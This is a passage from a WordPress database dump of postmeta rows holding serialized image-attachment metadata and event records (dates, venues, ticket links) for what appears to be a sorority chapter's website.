ime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:20:\"APPA2020-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:20:\"APPA2020-494x300.png\";s:5:\"width\";i:494;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:20:\"APPA2020-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5523,1452,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:2560;s:4:\"file\";s:41:\"2021/09/2020-Basileus-LW-left-scaled.jpeg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"2020-Basileus-LW-left-240x300.jpeg\";s:5:\"width\";i:240;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:35:\"2020-Basileus-LW-left-819x1024.jpeg\";s:5:\"width\";i:819;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"2020-Basileus-LW-left-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"2020-Basileus-LW-left-768x960.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:960;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:36:\"2020-Basileus-LW-left-1229x1536.jpeg\";s:5:\"width\";i:1229;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:36:\"2020-Basileus-LW-left-1638x2048.jpeg\";s:5:\"width\";i:1638;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:34:\"2020-Basileus-LW-left-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:34:\"2020-Basileus-LW-left-450x300.jpeg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:34:\"2020-Basileus-LW-left-680x300.jpeg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:34:\"2020-Basileus-LW-left-180x110.jpeg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"10\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:13:\"Canon EOS 70D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1602941837\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:7:\"0.00125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:26:\"2020-Basileus-LW-left.jpeg\";}'),(5522,1452,'_wp_attached_file','2021/09/2020-Basileus-LW-left-scaled.jpeg'),(5520,1390,'_rawhtml_settings','0,0,0,0'),(5521,1390,'_yoast_wpseo_estimated-reading-time-minutes',''),(5516,1444,'ts_article_views','0'),(5515,1444,'post_settings',NULL),(5514,1444,'page_settings',NULL),(5504,1444,'ts_template','a:0:{}'),(5500,1431,'_yoast_wpseo_primary_event_categories','23'),(5505,1444,'_edit_lock','1611704297:1'),(5492,1431,'_yoast_wpseo_content_score','60'),(5491,1431,'day','1613692800'),(5489,1431,'_rawhtml_settings','0,0,0,0'),(5490,1431,'event','a:13:{s:3:\"day\";s:10:\"2021-02-19\";s:10:\"start-time\";s:7:\"7:30 PM\";s:8:\"end-time\";s:0:\"\";s:19:\"event-enable-repeat\";s:1:\"n\";s:9:\"event-end\";s:10:\"2021-02-19\";s:12:\"event-repeat\";s:1:\"1\";s:5:\"theme\";s:0:\"\";s:6:\"person\";s:0:\"\";s:3:\"map\";s:0:\"\";s:9:\"free-paid\";s:4:\"paid\";s:10:\"ticket-url\";s:41:\"https://www.eventbrite.com/e/137353661499\";s:5:\"price\";s:6:\"$25.00\";s:5:\"venue\";s:7:\"Virtual\";}'),(5487,1431,'ts_template','a:0:{}'),(5502,1438,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:62:\"2021/01/140211258_3662888647079788_6327641844132942069_n-1.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:62:\"140211258_3662888647079788_6327641844132942069_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:62:\"140211258_3662888647079788_6327641844132942069_n-1-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(5480,1277,'ts_article_views','8'),(5463,1418,'_wp_attached_file','2020/08/Mic-Check-2-flyer-FINALfinal-e1597691784172.png'),(5464,1418,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:55:\"2020/08/Mic-Check-2-flyer-FINALfinal-e1597691784172.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"Mic-Check-2-flyer-FINALfinal-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:42:\"Mic-Check-2-flyer-FINALfinal-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"Mic-Check-2-flyer-FINALfinal-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"Mic-Check-2-flyer-FINALfinal-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:40:\"Mic-Check-2-flyer-FINALfinal-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:40:\"Mic-Check-2-flyer-FINALfinal-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:40:\"Mic-Check-2-flyer-FINALfinal-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:40:\"Mic-Check-2-flyer-FINALfinal-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5398,1374,'_wp_attached_file','2020/01/Empowerment-temp.jpg'),(5399,1374,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:180;s:6:\"height\";i:160;s:4:\"file\";s:28:\"2020/01/Empowerment-temp.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"Empowerment-temp-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:28:\"Empowerment-temp-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5401,1375,'_wp_attached_file','2020/01/scholarship1.png'),(5402,1375,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:640;s:4:\"file\";s:24:\"2020/01/scholarship1.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"scholarship1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"scholarship1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"scholarship1-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:24:\"scholarship1-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:24:\"scholarship1-640x300.png\";s:5:\"width\";i:640;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:24:\"scholarship1-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5403,1376,'_wp_attached_file','2020/01/scholarship2.png'),(5404,1376,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:640;s:4:\"file\";s:24:\"2020/01/scholarship2.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"scholarship2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"scholarship2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"scholarship2-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:24:\"scholarship2-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:24:\"scholarship2-640x300.png\";s:5:\"width\";i:640;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:24:\"scholarship2-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5408,1379,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:30:\"2020/01/Empowerment-summit.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Empowerment-summit-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:30:\"Empowerment-summit-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5495,1431,'ts_header_and_footer','a:3:{s:14:\"disable_header\";i:0;s:14:\"disable_footer\";i:0;s:11:\"breadcrumbs\";i:0;}'),(5407,1379,'_wp_attached_file','2020/01/Empowerment-summit.jpg'),(5410,1382,'_wp_attached_file','2020/07/blue-and-white-LW-headshot.jpg'),(5411,1382,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:682;s:6:\"height\";i:1024;s:4:\"file\";s:38:\"2020/07/blue-and-white-LW-headshot.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"blue-and-white-LW-headshot-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"blue-and-white-LW-headshot-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"blue-and-white-LW-headshot-682x1024.jpg\";s:5:\"width\";i:682;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:38:\"blue-and-white-LW-headshot-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:38:\"blue-and-white-LW-headshot-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:38:\"blue-and-white-LW-headshot-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:38:\"blue-and-white-LW-headshot-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5498,1431,'ts_article_views','3'),(5497,1431,'post_settings',NULL),(5496,1431,'page_settings',NULL),(5494,1431,'ts_sidebar','a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";i:0;}'),(5493,1431,'_yoast_wpseo_estimated-reading-time-minutes',''),(5432,1390,'_edit_lock','1611704603:1'),(5433,1390,'_edit_last','1'),(5434,1390,'ts_template','a:0:{}'),(5435,1390,'event','a:13:{s:3:\"day\";s:10:\"2020-08-15\";s:10:\"start-time\";s:7:\"2:00 PM\";s:8:\"end-time\";s:7:\"4:00 PM\";s:19:\"event-enable-repeat\";s:1:\"n\";s:9:\"event-end\";s:10:\"2020-08-15\";s:12:\"event-repeat\";s:1:\"1\";s:5:\"theme\";s:0:\"\";s:6:\"person\";s:18:\"youth@zphiblgz.org\";s:3:\"map\";s:0:\"\";s:9:\"free-paid\";s:4:\"free\";s:10:\"ticket-url\";s:0:\"\";s:5:\"price\";s:0:\"\";s:5:\"venue\";s:7:\"virtual\";}'),(5425,1384,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1736;s:6:\"height\";i:1017;s:4:\"file\";s:20:\"2020/07/reclaims.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"reclaims-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"reclaims-300x176.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"reclaims-768x450.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"reclaims-1024x600.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"reclaims-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:20:\"reclaims-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:20:\"reclaims-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:20:\"reclaims-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1560268205\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(5427,1386,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1720;s:6:\"height\";i:539;s:4:\"file\";s:22:\"2020/07/reclaims-1.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"reclaims-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"reclaims-1-300x94.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"reclaims-1-768x241.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:241;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"reclaims-1-1024x321.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:321;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"reclaims-1-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:22:\"reclaims-1-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:22:\"reclaims-1-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:22:\"reclaims-1-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1560268205\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(5426,1386,'_wp_attached_file','2020/07/reclaims-1.jpg'),(5424,1384,'_wp_attached_file','2020/07/reclaims.jpg'),(5428,1387,'_wp_attached_file','2020/07/chapter-photo-smaller.jpg'),(5429,1387,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2212;s:6:\"height\";i:904;s:4:\"file\";s:33:\"2020/07/chapter-photo-smaller.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"chapter-photo-smaller-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"chapter-photo-smaller-300x123.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:123;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"chapter-photo-smaller-768x314.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:314;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"chapter-photo-smaller-1024x418.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:418;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:33:\"chapter-photo-smaller-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:33:\"chapter-photo-smaller-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:33:\"chapter-photo-smaller-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:33:\"chapter-photo-smaller-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1573870912\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(5430,1388,'_wp_attached_file','2020/07/chapter-photo-smaller-1.jpg'),(5431,1388,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1590;s:6:\"height\";i:650;s:4:\"file\";s:35:\"2020/07/chapter-photo-smaller-1.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"chapter-photo-smaller-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"chapter-photo-smaller-1-300x123.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:123;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"chapter-photo-smaller-1-768x314.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:314;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"chapter-photo-smaller-1-1024x419.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:419;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:35:\"chapter-photo-smaller-1-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:35:\"chapter-photo-smaller-1-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:35:\"chapter-photo-smaller-1-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:35:\"chapter-photo-smaller-1-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1573870912\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(5436,1390,'day','1597449600'),(5437,1390,'_yoast_wpseo_content_score','60'),(5438,1390,'_yoast_wpseo_primary_event_categories','43'),(5439,1390,'ts_sidebar','a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";i:0;}'),(5440,1390,'ts_header_and_footer','a:3:{s:14:\"disable_header\";i:0;s:14:\"disable_footer\";i:0;s:11:\"breadcrumbs\";i:0;}'),(5441,1390,'page_settings',NULL),(5442,1390,'post_settings',NULL),(5443,1390,'ts_article_views','191'),(5448,1395,'_wp_attached_file','2020/07/LGZ_YouthOpenHouse2020-finalsmall-e1594225078306.png'),(5449,1395,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:155;s:6:\"height\";i:200;s:4:\"file\";s:60:\"2020/07/LGZ_YouthOpenHouse2020-finalsmall-e1594225078306.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"LGZ_YouthOpenHouse2020-finalsmall-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:45:\"LGZ_YouthOpenHouse2020-finalsmall-155x110.png\";s:5:\"width\";i:155;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\